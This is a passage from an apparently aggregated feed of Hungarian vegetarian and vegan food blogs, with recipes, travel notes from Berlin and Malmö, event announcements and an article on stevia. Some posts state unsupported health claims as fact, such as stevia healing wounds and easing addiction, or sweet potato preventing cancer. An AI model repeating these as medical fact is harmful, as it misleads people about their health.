tudom képzelni rizzsel, kuszkusszal, bulgurral, kölessel és még quionaval is. Meg egy nagy tál salátával. Nyamm! Paradicsomszószban sült tojás, azaz shakshuka Hozzávalók 2 főre: - 1 db konzerv hámozott paradicsom, turmixoljuk simára - 2 db bio tojás - 1 golyó mozzarella - 1 kis cukkini, felkockázva - 2 gerezd fokhagyma, felaprítva - 3 ág kakkukfű, levelei - 1 teáskanál chili pehely - só, bors - olívaolaj Egy sütőtálkába öntsünk bele a paradicsomlevet, sózzuk, borsozzuk és keverjük össze. Adjuk hozzá a felkockázott cukkinit, a fokhagymát és tépkedjük bele a mozzarellát. Üssük bele a két tojást, szórjuk meg a kakukkfűvel, a chili pehellyel és locsoljuk meg két teáskanálnyi olívaolajjal. Előmelegített sütőben süssük 180 fokon 15-20 percig, amíg a tojások megsülnek, a mozzarella pedig elolvad. Fokhagymás pirítóssal tálaljuk.
A jövő farmja
2012. január 7. Gitta nyersétel blogja
Bizonyára ti is hallottatok már a fenntarthatóságról, arról, hogy a mai civilizált világunk sokkal több energiát fogyaszt, mint amennyire igazából szükségünk lenne. Folyamatosan távolodunk a természettől. Vannak riasztó adatok, riasztó tények... nem akarlak benneteket ezzel fárasztani. Viszont találtam egy nagyon jó filmet, amit meg szeretnék osztani veletek. Nézzétek meg! Szerencsére egyre több kezdeményezés van már Magyarországon is, remélem nálunk is lesz jövő farmja.
Kakukkfüves édesburgonya
2011. december 26. A vegán szépség
Hozzávalók: -1kg édesburgonya -2 mokkáskanál kakukkfű -olívaolaj, -só, bors, vegamix -4 gerezd fokhagyma -1-2 db lilahagyma -átlátszó nejlonzacskó, vagy sütőzacskó A szubtrópusok egyik legfontosabb népélelmezési cikke az édesburgonya (Ipomoea batatas (L.) Lam), amelyet óceániai útleírásokból kumara, spanyol nyelvterületeken batáta, egy japán étterembe térve pedig satsuma-imo néven ismerhetünk. A magyar neve megtévesztő, ugyanis bár a megvastagodott tároló-gyökere, amelyet étkezéshez használnak, nagyon hasonlít a mérsékelt égöv burgonyájához, de rendszertani besorolása szerint nem burgonyaféle, hanem a szulákfélék nemzetségébe tartozó, évelő növény. Maga a növény sem hasonlít a burgonyához: hosszú, kúszó indái vannak, levelei nagyok, szív alakúak, virágai hasonlóak a hajnalkáéhoz, illetve a nálunk szulák néven ismert gyomnövény virágaihoz. Elsősorban megvastagodott tároló-gyökeréért termesztik, amelyből növényenként általában 4-10 darab alakul ki. Ezek felülete fehér, barnás, narancssárga, pirosas bíbor, a hús színe fehér, narancssárga vagy piros. Két alapvető fajtája (és mindkettőnek számos alfaja) van: az egyiknek fehér, vagy világos szürke színű a húsa, a bőre pedig mély lila színű, íze a szelídgesztenyére hasonlít. A másik fajta húsa sötét narancssárga, bőre sárgás színű. Ennek az íze a legédesebb sütőtök ízére hasonlít. Amerika trópusi részein őshonos, de Amerikától Afrikán és Délkelet-Ázsián keresztül Óceániáig a világ szinte összes trópusi, szubtrópusi vidékén termesztik, sőt, az egyik legfontosabb népélelmezési cikként tartják számon. A termesztése és a fogyasztása például az Egyesült Államok déli államaiban a burgonyánál nagyobb arányú. A legtöbbet Brazíliában termesztenek belőle, ahol a szeszgyártásnak is alapanyagául szolgál. Miért jó? Az édesburgonya húsos, gumószerűen megvastagodott gyökere szénhidrátban és (különösen a sárga húsú fajta) béta-karotinban gazdag. C-vitamin-tartalma 15-30 mg/100 g, de tartalmaz B1, B2, B6, és E vitaminokat is. A többi zöldségféléhez képest sok, 1,5-2 g/100 g fehérje található benne, amelynek összetétele a tojáséhoz hasonló. Délkelet-Ázsiában a zsenge leveleit, hajtásait is fogyasztják, ezekben a gyökerénél is több a C-vitamin és a béta-karotin. Értékes ásványi anyagokat tartalmaz: kalcium, vas, magnézium, mangán, kálium, foszfor, nátrium, szelén, réz és cink is található benne. Egy perui kutatóközpont, a Limában működő Nemzetközi Burgonyaközpont (CIP) szakértője, Daniel Reynoso Tantalean az édesburgonyával foglalkozó tanulmányában azt állítja, hogy a batátának gazdag ásványi anyagtartalma miatt daganatmegelőző hatása is van, csökkenti a gyomorrák és a májbetegségek kockázatát és antioxidánsai, vitaminjai és proteinjei segítenek megőrizni a fiatalságot. Energiatartalma száz grammban 117 kalória, így akár a fogyókúrázók is beleilleszthetik az étrendjükbe. Hogyan fogyasszuk? Az édesburgonya gumóit sütve, párolva, grillezve, főzve, pürésítve, húsok mellé köretként vagy főzelékként fogyaszthatjuk, édes sütemény, lepény is készülhet belőle. Remek alapanyaga lehet az egyéni kísérletezéseknek, általában elmondható, hogy a rebarbara, a sütőtök és a burgonya felhasználási módjaihoz hasonlít a felhasználási területe. Trópusi termesztő helyein - ahol a mennyiség nem akadály, hiszen az erre szakosodott gazdaságokban tonnaszámra termesztik és egyes fajtákon több kilós gumóóriások is előfordulnak -, a lisztjéből kenyeret sütnek, keményítőnek is feldolgozzák illetve szeszt is főznek belőle. Tippek-tanácsok Nagyobb hipermarketekben, zöldség-gyümölcs üzletekben Magyarországon is kapható. Ha édesburgonyát vásárolunk, vigyázzunk, hogy friss legyen - ilyenkor a bőre feszes, sima. Nagy nedvességtartalma miatt csak néhány napig tárolható, és inkább száraz, hűvös helyen, mint hűtőszekrényben ajánlatosabb tartani a felhasználásáig. Előkészítése, tisztítása hasonlóképpen történhet, minta burgonyának: lehet hámozni, vagy csak vizesen ledörzsölni, kaparni is a héját, de megsüthető a héjában is. forrás:herba-fitt.hu
vigyázz, kész, főzz! - 46. forduló & vegasztrománia hónap vol 2
2011. november 17. Vegasztrománia
napok óta vigyorgok. és dörzsölöm a tenyerem. mert A vágyam, hogy a vegetáriánus konyha népszerűsége nőjön magyarországon, most kap egy löketet. illetve kettőt. mert a sors (ismét) segítségemre sietett, és adott egy dátumot dupla erőkkel. egyrészt zizitől megkaptam a vkf stafétát, másrészt november 17. most már hagyományosan is a vegasztrománia hónap kezdete. a vkf egy kreatív gasztro-játék, melyet chili&vanilia indított útjának 2007-ben. ezt a hagyományt folytatva meghirdetem a 46. fordulót, melynek témája: vega koszt & fabula, vagy ha így jobban tetszik, vega krónika & fogás. mindenkinek volt olyan időszak az életében, amikor nem evett húst. lehet, hogy években mérhető, de az is lehet, hogy csak egy napig tartott. kíváncsi vagyok a vega oldalatokra, szeretném hallani ezeket a történeteket egy-egy hozzá kapcsolódó húsmentes recepttel kiegészítve. várom a vegetáriánusok vegává válásának sztorijait, a megrögzött ragadozók egy-egy elgyengült pillanatának felidézését, és a két véglet között létező többség növényevő intervallumainak anekdotáit. és várom a fabulákhoz tartozó koszt receptjét, a krónikákat kiegészítő fogások leírását. a határidő december 18. vasárnap éjfél. az írásokat december 12. és 18. között tegyétek közzé a blogokon, ezek linkjét várom a vegasztromania@freemail.hu e-mail címre. akinek nincsen blogja, de szeretne mesélni, küldje el nekem e-mailen, és közzéteszem a vegasztrománián. de ez még nem minden, boldogságom másik fele, hogy a 46. vkf teljesen egybeesik a tavaly elkezdett vegasztrománia hónappal. mivel ez már hagyomány, idén is meghirdetem az ezzel kapcsolatos játékot, vagyis november 17. és december 17. között legalább egyszer főzzetek egy szabadon választott, már létező, vagy újonnan kitalált vegetáriánus fogást - szigorúan nem desszertet - , írjátok le, hogyan készítettétek, fotózzátok le és küldjétek el a vegasztromania@freemail.hu e-mail címre! a recepteket folyamatosan küldhetitek, és több recepttel is lehet pályázni. annyit újítottam a tavalyihoz képest, hogy idén fortuna mellett egy vega-zsűri is alakítja az eseményeket. a vega-zsűri tagjai (kovács patrícia, harcsa veronika és békefi dóra) kiválasztják a szerintük legizgalmasabb receptet (és tulajdonosát), az én vega kezem pedig kihúz egy szerencsést. ők ketten nyereményként másodmagukkal részt vehetnek nálam januárban egy vega vacsorán, a zsűri által kiválasztott recept gazdája pedig ezen felül nyer egy ájurvédikus masszázst kedvenc gyöngyimnél. legyen mánia a vegasztronómia! ui: vagyok annyira telhetetlen, hogy külön pályaművet várok mindkét esemény alkalmából! Megosztás
Rakott burgonya "füstölt szalonnával"
2011. augusztus 23. A vegán szépség
Ez az étel tökéletes kombinációja a hagyományos magyaros ízeknek, és a vegán konyha friss találékonyságának. Könnyen és gyorsan elkészíthető. Jó étvágyat! :) Hozzávalók: -1 kg burgonya -1 db közepes padlizsán -1 doboz zabtejszín(Oatly) -2.5 dl házi kókusztej -himalaya só, bors, füstölt édes-nemes paprika, tárkony, bazsalikom, szárított petrezselyem, bors -olíva olaj -5-6 gerezd fokhagyma -biomargarin
SVÉDORSZÁG, MALMÖ
Azt hittem, kicsit több lehetőségem lesz majd internetezni, de erre felé úgy tűnik, nem divat a wifi. Mielőtt belekezdenék a svédországi élményekbe, még muszáj egy-két képet megmutatnom a berlini vadkempingezésünkről. Nagyon félve használtam az autóban a kempinggázt, de Bertának is és magunknak is akartunk készíteni valami meleget a hideg időben. Miso levest ittunk (mindhárman), és a saláta mellé mi még egy kis kuszkuszt is ettünk. Itt már kissé jobb az idő (ezt nem sokáig élvezhettük) Ez egy, az elmúlt hetekben nyílt teljesen vegán szupermárket. Magyar termékeket is találtam, és természetesen a nyers konyha alapanyagai is megtalálhatóak. De Berlinben nem csak nyers ételt lehet enni. A vadkempingünk környékén találkoztunk Johannal, aki néhány hónapja nyitotta meg pörkölővel egyben kávézóját is. Maga pörköli a kávéit. Eredetileg mérnök, de 20 év után elege lett az egyre gyorsuló világból és mély levegőt vett, majd fejest ugrott a szabadságba: régi szenvedélyét, a kávét helyezte középpontba. Kitanulta amit csak lehetett, és megszületett a Jo Café a Johann névből, de ez magyarul még jobban hangzik, mert tényleg fantasztikus kávét készít. Ez pedig már Klaus vagy Mathias, már nem emlékszem, de ő kizárólag borral és fröccsel vendégeli a kis zöld lakónegyedből idelátogatókat. Egy csodás park felett áll ez a bódé, és hihetetlenül kedvesek mind az alkalmazottak, mind pedig a vendégek. Ismét sikerült egy anti-túrista helyre látogatnunk, ezek a kedvenceink. Berlin tehát tele van meglepetésekkel, biztosan visszatérünk még egyszer. De mi is történt Berlin után? Hétfőn délutánra elkészült az autónk (szerencsére garanciálisan), így elindulhattunk észak felé. Utolsó ebédünket természetesen a nyers étteremben költöttük el. Malmöben már vártak ránk a barátaink, de már tudtuk, hogy aznap nem érünk már oda a komphoz, így egy Rostock közeli kempingben töltöttük az éjszakát, ahol amellett hogy agyon csípkedtek a szúnyogok (zoknin, ruhán keresztül), teljesen elhűltünk, micsoda mega-kempingezés folyik itt. Innentől északra és nyugatra már nem lepődtünk meg, de ez volt az első ilyen élményünk. Egy egész kemping-megapoliszba érkeztünk, ahol persze szuperebbnél szuperebb lakókocsik álltak, és a bártól a mozin és közérten át minden volt ebben a kempingben. Mivel csak egy éjszakát maradtunk potom 5 eurót fizettünk összesen. Másnap végre jó idő volt, és egy kis átmozgató futás után siettünk a 9 órás komphoz, amire már sajnos nem fértünk fel. Maradt az egy órás komp. Így a köztes időben megnéztük Rostockot, ami egy nagyon kedves kis város. A piac bio standján be is vásároltunk zöldség-gyümölcsből, ebből készült az ebéd:) Bazsalikom körömvirággal tűzdelve a standon Ezekből csemegéztünk a kompra várva (Nyers tortilla lap, vegyes saláta virágokkal, édeskömény, aszalt paradicsom krém, marinált olajbogyó és articsóka, radicchio) Ezek a tekercsek egyszerűek, változatosak és könnyen fogyaszthatóak az úton. Aszalt lap híján a salátalevél is megteszi:) Malmöbe érkezve gyorsan kempinget kerestünk a tengerparton. A barátaink a berlini csúszás miatt már nem tudtak minket fogadni, csak egy vacsora erejéig tudtunk találkozni. Henrik és Yoshiko Ezt a nagyon érdekes és kedves párt Japánban ismertük meg egy vulkán tetején Yufuinban. Ez egészen délen, Kyushu -szigeten található (idáig még nem jutottam el a beszámolóval, de lassan majd csak odaérek). Jövőre remélhetőleg ők is eljönnek hozzánk végre, bár Henrik járt már Magyarországon 89 tavaszán, úgyhogy érdekes emlékei vannak. Reggeli a kempingben: egyik nap, másik nap Mi sem volt természetesebb Malmöben egy kis hajókázós városnézés után, mint megnézni az egyik nyers éttermet. Mert itt kettő is van. A The raw house a berlinihez hasonlóan néhány hete nyitott. Egy házaspár üzemelteti. Hihetetlenül kedvesek, és mindennel nagyon meg voltunk elégedve. A kalapos úr a tulajdonos. Granolák üvegcsékben Zeller, uborka, alma, gyömbér, búzafű: )) A combo tál: Isteni gazpacho, thai saláta és hamburger Szendvics Isteniek voltak az ízek, az adagok is jók voltak. Szerencsére Malmöben végig szuper időnk volt, így kedvünkre futkározhattunk a parton, jógázhattunk, sétálhattunk. A svédek nagyon kedvesek, és sajátos humoruk van. Nagyon figyelnek a környezetükre, a városban még a buszok is környezetbarát gázhajtással működnek. Rengeteg a kerékpáros, a fiatal. Malmöben sok a dán, mert itt egy kicsit olcsóbb az élet, könnyebben megy a különböző nemzetiségűek közötti házasságkötés is. És tulajdonképpen csak egy híd választja el a két országot egymástól. A városban rengeteg a park, egytől egyig gyönyörűek. Ha jó idő van, az emberek szívesen kiheverésznek a fűbe. Itt is sok kutyával találkoztunk, és ha nem is mindenhová, de számos helyre beengedték Bertát is. Itt is kóstoltunk díjnyertes kávét. Nem csak ez a hely, de a többi is olyan ötletesen, hangulatosan van kialakítva! Innen irány Stockholm! Folyt köv:)
Balatoni Nyár :) az m1 műsorán a Főzés nélkül finoman
2011. július 30. Főzés nélkül finoman!
Ilyenkor nyáron :), na de komolyan nyár van, igaz nem látszik, mert két napja kabátban mentem vásárolni, szóval nyáron az m1 tv csatorna délelőttjének egy része leköltözik a Balatonra, és a Balatoni Nyár című műsorral szórakoztat bennünket. Erre a napra csodálatos időt kaptunk a teremtőtől :) Ennek a műsornak a részeként 2011.08.05-én 09.00 - 11.00 óráig a Főzés nélkül finoman személyemben meghívást kapott egy kis főzőcskézésre, - rábólintottam rendben -, de mit eszünk majd? Nézegettem a fejemben meglévő választékot, és a következő menüsor született meg belőle: Receptek: Sárgadinnye-lekváros mandulás ,,süti Hozzávalók 4 személyre: 12 evőkanál darált mandula 4 evőkanál aranymazsola 4 evőkanál kókuszreszelék 4 szelet sárgadinnye (ajánlott 8 felé vágni az egész dinnyét) 4 db nektarin kevés vagy rengeteg fahéj A hántolt (a hántolatlan is kiváló) mandulát durvára őröljük, a sárgadinnyét daraboljuk, és az aranymazsolával pépesre daráljuk, majd a mandulával összekeverjük és félretesszük állni. A nektarinokat kisebb kockára vágjuk. 20-30 perc után a mandulás lekvárunkat összekeverjük a nektarinnal, majd négy kehelybe porciózzuk, fahéjjal, kókuszreszelékkel ízesítjük. Görögdinnye saláta pikánsan Hozzávalók 4 személyre: 4 szelet görögdinnye (ajánlott 8 felé vágni az egész dinnyét) 2 fej lilahagyma 8 evőkanál fekete olívabogyó 2 dl hidegen sajtolt olívaolaj 6-8 friss bazsalikom- és mentalevél kevés rózsaszín Himalája só A héjától megszabadított görögdinnyét ha zavaró akkor kimagozzuk, daraboljuk, a lilahagymát nagyolva összevágjuk, a bazsalikom- és mentaleveleket aprítjuk, sózzuk és bőségesen meglocsoljuk olívaolajjal vagy szőlőmagolajjal, majd az egészet az olívabogyóval összekeverjük (vigyázzunk a dinnyét ne törjük össze). Petrezselymes sárgarépa-pástétom magyarosan Pirított tönkölykenyér vagy zöldséges durumtészta Hozzávalók 4 személyre: 4 db sárgarépa 1 csokor petrezselyem 4 db paradicsom 4 evőkanál mandula 1/2 pár füstölt gabonakolbász 2 dl olívaolaj 1/2 kg tönkölykenyér vagy zöldséges durumtészta kevés rózsaszín Himalája só A sárgarépát kisebb darabokra vágjuk, ezzel a kíméljük a darálónkat, vagy a turmixgépet, a petrezselymet, paradicsomot is apríthatjuk előre, és a mandulát is elődarálhatjuk, majd hozzáadva az olajat, gabonakolbászt, sót krémesre daráljuk az egészet. Erősebb készülékeknél a receptben felsoroltakat együtt pépesítjük. Pirított tönkölykenyérre kenve tálaljuk vagy durumtésztára szószként (tésztához adva ajánlott egy kicsivel több olajat használni). Szeretettel várlak benneteket a képernyő elé a fent megadott időben, egy kis közös főzőcskére, kikapcsolódásra, ha elfoglaltságod vagy munka miatt nincs lehetőséget élőben nyomon követni a műsort, később is megnézheted majd az m1 videotárjában. http://videotar.mtv.hu/Videok/2011/08/05/11/Balatoni_nyar_2011_augusztus_5_.aspx (12perc 12 mp; 63 perc 53 mp :) Szeretet teljes öleléssel: Javed
Karfiol paprikás
2011. július 3. Legyen néktek eledelül...
Pénteken egész menüt készítettem a sorozat receptjeiből válogatva, vegyes sikerrel. A karfiolpaprikás receptjét olvasva nagyon lelkes lettem, mert egyszerű, és magyaros ízvilábúnak tűnk. Szigorú receptkövtésre szántam el magam. Mennyi hagyma, mennyi mennyi ideig, mennyi vízben... Sajnos a konyha még erősen őrzi a nyaralás utáni káosz emlékeit. Az amúgy sem nagy konyhámban most végképp nincs hely... Olyan logisztikai sakkozás volt a főzés, mert a sütben közben fűszeres kenyér sült, előtte megy padlizsán hagymával a pástétomhoz.... Nem apróztam el:). Egy szó mit száz, zajlott az élet a konyhában, mérlek, mérőkancsók osztoztak az aprócska felöleteken. Visszatérve a karfiolunkhoz, döbbentem olvastam, hogy semilyne zsíradékot nem tartalmazott a recept, és ezzel nem tudtam kibékülni... Miben oldódna fel a pirospaprika??? Szóval tettem bele egy kis pálmazsírt. Ezen az epróságon kívül tényeg mindenhol a recepthez tartottam magam, egészen a kostolás pillanatáig. Gyakorlatilag nem volt semmi iza:(.Még a nem kis macerával járó mandulatejfölt sem lehetett éreztni... Nem volt mit tenni, tettem mellé egy kis bio fűszersót. Főztem még pár percet, és a végeredmény igazán egyszerű, de finom laktató ebéd lett. Galuskát próbáltam főzni hozzá, ami egy következő bejegyzés, kevésbbé sikeres beszámolója lesz:)
Nagyszombati menü
Reggeli: Vegán fonott kalács, frissítő tea (mate, hibiszkusz, csipkebogyó maggal, málnalevél, szederlevél) Ebéd: - Bajai Halászlé Hozzávalók: személyenként fél kg hal, 5 dkg hagyma, 6dl víz, fél evőkanál törött paprika, só, és Baján halászlétészta! (a recept e könyv 266. oldalán megtalálható, elkészítése Baján a férfiak művészete.) - Somlói galuska Én így készítem: egy vegán piskótát kis darabokra tépkedek, meglocsolom rumos növényi tejjel. Másfél liter növényi tejből, 3 csomag csokoládé pudingporból, 3 evőkanál kakaóporral pudingot főzök, ezt ráöntöm a piskótára. Belekeverek 20-25 dkg mazsolát és ugyanennyi durvára vágott diót. 6 púpozott evőkanál kakaópor, 6 lapos evőkanál cukor és víz keverékével csokiöntetet készítek, ezt ráöntöm a galuskára. Vacsora - Marcipánleves növényi tejjel készítve - Nemvegánoknak: sonka, tojás - vegánoknak: Földimogyorós fasírt Hozzávalók: 1dl kukoricadara 1dl finomra vágott (reszelt) zellergumó 1 gerezd fokhagyma préselve 2 evőkanál szójaliszt 1,5 teáskanál só 5 dl víz 2 dl pörkölt mogyoró 2 dl zabpehely A földimogyorót megdaráljuk. Az első hét hozzávalót 30 perc alatt, kevergetve megfőzzük. A tűzről levéve hozzáadjuk a többit. Kis lapított gömböket formálunk belőle, és sütőben 30-40 perc alatt megsütjük. - Fenyőmagos saláta - Póréhagyma saláta Hozzávalók: 1 póréhagyma, 2 db alma, 1 kukoricakonzerv, egy nagy doboz kefír, méz, só, citromlé A póréhagymát vékony karikákra vágjuk, megsózzuk. Az almát gyufaszeletekre daraboljuk meglocsoljuk egy kis citromlével, hozzáadjuk a kukoricakonzervet. A kefírbe egy teáskanál mézet keverünk, sózzuk és a salátára öntjük. - Fonott kalács karikára formázva, hogy a közepébe belehelyezhessük a kemény tojásokat. - Almatorta 20 dkg liszt, 10 dkg porcukor, 10-15 dkg Rama.Összegyúrni, 10 perc pihenő után lapostányérnál nagyobb körlappá nyújtani. Rászórni:aszalt gyümölcsöt (Kalifa), rá marcipánt, esetleg dió, mazsola. Két közepes almát cikkekre vágva ráhelyezni, megszórjuk cukorral, fahéjjal, ráhajtani a peremet, megkenni tojással, kisütni.
Életjel, A vegán szépség
Elég régen írtam már, tudom, de higgyétek el, nyomós mentségem van rá. Először is, pihentem egyet karácsonykor, közben augusztus óta az első regényemet írom, közben állatokat mentek, gyerekeket támogatok, nemfőzök, és még egy új blogot is előkészítettem. Közben pedig arra is rájöttem, hogy bár anyaként sokszor multifunkcionális vagyok, ezt a szabadidőmre kevésbé tudom már elmondani. Mikor elkezdtem a könyvemen dolgozni, nem is tudam másra koncentrálni, mígnem kapcsolatba kerültem az óceánon innen és túl egy halom fantasztikus emberrel, csodálatos lélekkel, és általuk megismerkedtem a raw food-dal(nyersétkezés) is. Közben pedig olyan mértékben beszippantott, hogy azon kaptam magam, szinte alig főztem, vagy a már itt is prezentált repertoárból kerítettem meleg ebédet Hugonak. Szóval ami újdonság volt, az mind a nyers kategóriába tartozott, és nem voltam benne biztos, hogy szeretném e keverni a gyermekétkezéssel. Tulajdonképpen mostanra már rájöttem, semmi akadálya nem lett volna, hiszen a gyermekek első szilárd táplálékai nyers gyümölcsök zöldségek , és a lehető legjobb dolog lenne számukra, ha ez a későbbiekben is így maradna. Aztán még nem éreztem elegendő kompetenciát, hogy nyersételekről annyit írjak, míg valóban meg nem tanulom minden csínját-bínját. De ezeket nem lehet megtanulni. Mások receptjeit el lehet készíteni, sajátot lehet kreálni a szájízünk szerint, sok alapanyagot, amit eddig nem is ismertünk be lehet szerezni. De alapvetően attól lesz az ember kompetens, hogy így étkezik. Ezt az életmódot élve kell magunkévá tenni a tudást. Aminek eredménye, hogy életünk végéig tanuljuk.:)) Aztán megint csak írtam írtam, és nem főztem, nem főztem, és lelkiismeretfurdalásom volt, hogy elhanyagolom a blogot, és vele együtt a receptéhes olvasókat is. Két hónapja viszont odáig fajult ez a nyersétel szeretet, hogy Budapesten részt vettem Urbán Vali élőételkészítő tanfolyamán. Ott pedig annyi inspirációt kaptam, és magától Valitól az ötletet, hogy fogjak bele egy videoblogba. Először őszintén nevettem rajta, mert arra gondoltam egyik blogomra sincs időm, nemhogy egy újat elkezdeni.. De aztán annyira szöget ütött a fejembe, hogy eldöntöttem, mégis belevágok. Nagy terveim vannak, mégcsak nem is sejtitek .)) Szerencsére az élet úgy hozta, segítőm is akadt azonnal, és egy hónap leforgása alatt hipp hopp, az élet tálcán nyújtott minden feltételt. A videofelvételeket itt az egyik varsói magyar anyuka Dóri segítségével vesszük fel kéthetente. Ő összevágja, én felrakom. Itt is szeretném neki megköszönni önzetlen munkáját. A facebookon A vegán szépség oldalon találjátok meg majd a folyamatosan bővülő videókat, recepteket, tudnivalókat, hasznos tanácsokat a vegán életmódról. Jaj, igen , mert ezidő alatt a vegetáriánus életmódról a vegánra váltottam. Az okokat hosszasan fogom boncolgatni, a nyers és nem nyers ételek receptjét, pedig videó formájában nézhetitek meg, amint otthon, vagy másoknál főzők-nem főzök:)) A videoblogot pedig a http://veganszepseg.blogspot.com/ weboldalon tudjátok követni. A Csemeteledel természetesen nem szűnik meg, ide is felkerülnek a további gyerek vegán és vegetáriánus, illetve nyers finomságok, videó formájában. Szívesen venném, hogyha írnátok nekem, milyen recepteket látnátok szívesen, milyen témákról hallanátok többet. Remélem innen is sokan csatlakoztok, hogy egy életmódváltással, egymás segítésével, ne csak önmagunk és gyermekeink egészségét, de a környezetet, az állatokat, és az egész Földet is segítsünk felemelni, átváltoztatni egy olyan békés és harmonikus világgá, amire mindig is vágytunk. Légy magad a változás, amit a világban látni kívánsz! (Mahatma Ghandi)
Bajai-i program
Alábbiakban 1 meghívó a Magyar Közlekedési Klub hírleveléről: Környezet- és Természetvédő Szervezetek XXI. Országos Találkozója - 2011. március 17-20 A Magyar Közlekedési Klub szokásos közlekedési szekcióját a Levegő Munkacsoporttal közösen tartja a Duna-mente közlekedése témában. Baja és környéke közlekedési problémáiról is szó lesz, konkrét panaszaikat, felvetéseiket előzetesen is várjuk a somodi@levego.hu e-mail címen. Helyszín: Baja, Eötvös József Főiskola Bajcsy-Zsilinszky u. 14. Rendezők: Baja Ifjúsági Természetvédelmi Egyesület Magyar Madártani és Természetvédelmi Egyesülettel Duna Környezetvédelmi Fórummal
Cukor helyett I.
2010. augusztus 22. CsemetEledel
Azt senkinek nem kell megmagyarázni, miért annyira káros méreg a finomított cukor. Roncsolja a fogakat, üres kalória, semmilyen az ember, vagy gyermekeink fejlődéséhez szükséges tápanyag nincsen benne. Hizlal, és rengeteg egészségügyi probléma alapvető okozója. De akkor mit együnk helyette? Mit rakjunk a teába(mondjuk semmit :), mivel süssünk? Cukor nélkül nem lehet élni. Hangzanak a kérdések és kifogások. Ebben a sorozatban szeretnénk információval szolgálni, milyen alternatívák léteznek, és hogyan tudjuk gyermekeinket, már a kezdetektől egészséges életmódra nevelni. A legjobb módszer, a példamutatás:) Próbáljuk ki, cseréljük le a fehér mérgünket egészséges édesítőkre. I.Stévia Szárított levei sokkal édesebbek, mint a répacukor. Nem károsítja a fogakat, ehetik cukorbetegek, nem hizlal, és még antibakteriális hatása is van. A legmeglepőbb, hogy régóta ismerhetjük, kapható is, mégsem élünk vele. Neve: Stévia Miért nem közismert? Paraguay guarani-indiánjai évszázadok óta a stevia leveleivel ízesítik teájukat, édes levélnek vagy édesfűnek hívják. Használják étvágycsökkentőnek, de bőrbetegségek kezelésére és sebgyógyításra is. Segítségével a sérülések szinte heg nélkül forradnak. Ki tudja, miért került most hirtelen megint a nagy üdítőgyártó érdeklődésének középpontjába ez a természetes édesítőszer és gyógynövény, amivel tulajdonképpen már itt, Magyarországon is jóformán évtizedek óta együtt élünk. Sokféleképpen írják és mondják, szteviának, sztéviának, sztíviának vagy magyarosan mézfűnek. Teája, kivonata por, folyadék vagy tabletta formájában országszerte kapható a bioboltokban. A fővárosban például húsznál több üzlet forgalmazza, de a vidéki nagyvárosokban is jó eséllyel ráakadhatunk, az internetes forgalmazókról nem is beszélve. A szóra rákeresve az Interneten csak magyar oldalakból több mint 25000 találatra lelhetünk, s bevonult a lap.hu-k sorába is. Nem valami gyanús eredetű csodaszerről van szó, a Semmelweis Egyetem tudományos kutatásai között is szerepel a növény hatásainak vizsgálata. Megismervén kedvező tulajdonságait, méltán csodálkozhatunk, hogy kerülhette el figyelmünket, és miért használják csak nagyon kevesen cukor helyett. Áldásos gyógynövény A Stevia rebaudiana Bertoni a 150 ismert stevia faj egyike, a Paraguay és Brazília határán húzódó Amambay hegylánc fennsíkján őshonos. A cserje évelő, mintegy 60 cm magas. Levelei 5-6 cm hosszúak, 2-3 cm szélesek. Az édes ízért felelős vegyületei az úgynevezett steviolglükozidok, a steviosid és a rebaudisin. Feltételezik, hogy a növény mérhetetlen édességével tartja távol esetleges ellenségeit. Tény, hogy rovarkártevője nincs. A levél kivonatának fogyasztása nem növeli a vércukorszintet, javítja a glükóztoleranciát, hosszú távon szabályozza a cukorháztartást. További áldásos élettani hatása, hogy csökkenti a vérnyomást, gyulladáscsökkentő, antibakteriális és gombaölő hatású. Főzete a zöld teánál erősebb antioxidáns. Serkenti a máj, a lép és a hasnyálmirigy működését, rendszeresen fogyasztva csökkenti a fáradékonyságot. Kiváló fog- és ínyápoló. Segít enyhíteni a dohányosok nikotinéhségét, de más szenvedélybetegeknek is hasznára van. A növény sok C- és A-vitamint, többek között cinket, vasat, magnéziumot tartalmaz. A cukrok cukra nem csak cukrosoknak Szárított leveleinek egy grammja mindössze 0,21 kilokalóriához juttatja a szervezetet. Hogyan lehetséges az, hogy egy a cukorrépából vagy cukornádból előállított cukornál, a szacharóznál 300-szor édesebb anyag jóformán nem ad energiát? Úgy, hogy a növény édességét adó vegyületeket az emberi szervezet nem képes lebontani. Hasonlóképpen, mint, mondjuk, a cellulózt, amivel megfelelő enzimek híján nem tudunk mit kezdeni. A steviolglükozidok vagy diterpénglükozidok vízben és alkoholban jól oldódnak. A molekula szerkezetében meghatározó steviol három cukrot, egész pontosan glükózt hordoz. Mint tudjuk, nem csak a cukrok és szénhidrátok lehetnek édesek. Édesnek érezhetünk nagyon különböző vegyületeket, így többek között az aszpartámot vagy más édesítőszereket is. Ilyenek a stevia természetes, édes vegyületei is. Egyébként szénhidrátok, de nem lebontható cukrok. A steviolglükozidok elégetésével nyerhető energiamennyiség az ember számára pusztán elvi érték, amihez nem férhetünk hozzá, ahogy a molekulában lévő glükózhoz sem. Ezen tulajdonságainak köszönheti, hogy cukorbetegek is bátran fogyaszthatják. Mivel kristályszerkezete stabil, 200?C-on is sértetlen, így sütésre is kiválóan alkalmas. kapható:a nagyobb drogériákban, vagy online itt vagy itt. folyt.köv. /forrás:hazipatika.com/
Élménybeszámolok, avagy Tofu a tortán!
2010. április 26. KryaSpirit-Vegalife
Pénteken délben felkerekedtünk Moncsi, Szilvi és én, hogy hosszú utazást tegyünk, egy már-már mediterránnak mondható magyar városba Szegedre, ahol mindig süt a nap. Terveink szerint városnézéssel indult volna a nap, amit Eminél fejeztünk be egy fantasztikus ,,Tofu a tortán vacsi keretében. A városnézés kis gikszerrel indult, belefutottunk ugyanis a csodálatos szegedi parkolási rendbe. Lehet, hogy ez a módi csak nekünk volt új, mindenesetre a ,,Három nem szőkének sikerült egy bírságot begyűjtenie röpke 7 perc alatt, vagyis amíg kinyomoztuk, hogy hol kaphatnánk parkolócédulát és megvettük azt. Szegeden nyilván túl bonyolultnak találták parkolójegy automaták felállítását, ráadásul zónákra osztották a belvárost. Így a mit sem sejtő turistának illene előre tudnia, hogy melyik zónában fog parkolni, hogy valahol a város szélén, mielőtt még parkolásra adja a fejét, megvehesse a jegyet. Mert ha a ,,tiltott zónában megáll és elhagyja a kocsiját, úgy hogy az ablakban nem díszeleg egy parkolójegy, a hiénák (lsd.:parkolóőrök) egyből ráugranak, videóznak és büntetnek. Így jártunk mi is. A városnézést rögtön az ügyfélszolgálati irodában kezdtük. Hozzátartozik, hogy ott azért készségesek és segítőkészek voltak. Utána már simán ment minden. Emi egy kedves és otthonos tetőtéri lakásban él a belvároshoz közel. A megismerkedés 